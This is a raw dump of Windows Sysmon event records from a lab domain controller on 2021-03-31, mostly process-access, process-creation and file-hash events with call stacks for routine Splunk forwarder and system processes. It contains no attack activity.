Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.855{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.401{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20F386AE3134AA1FB654B5B11708926D,SHA256=FD3FF8DAF52B3D0A94E192D5CC18CC1C71CBC71C4CF6BBAB982B25B1A1F316DB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.635{266CAFBE-66D7-6064-8301-00000000AE01}67961164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.479{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.480{266CAFBE-66D7-6064-8301-00000000AE01}6796C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:03.416{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D8F1299C63FE0A0F838E21B1268A353,SHA256=679EEFABA27D71DB7ACE6810D79A832947C6759A7D670B0CD4AA7F721C586695,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000011532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.619{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000011531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.621{266CAFBE-66D8-6064-8401-00000000AE01}7008C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000011530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:04.463{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34D69EC1E2956E5B02F54E7AC65B5172,SHA256=F6670068D6C880D2283085F8F9B0BD3AAFC4AC4213B703C556FF5938ED2E537E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:05.494{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6ACE04422A594E211B8D0616AF8F47,SHA256=34B1AA02732575D121A72D7B03A4010C4B3B2C58ED212BC630084915C25598A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011557Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:06.900{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66DA-6064-8601-00000000AE01}5228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011556Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 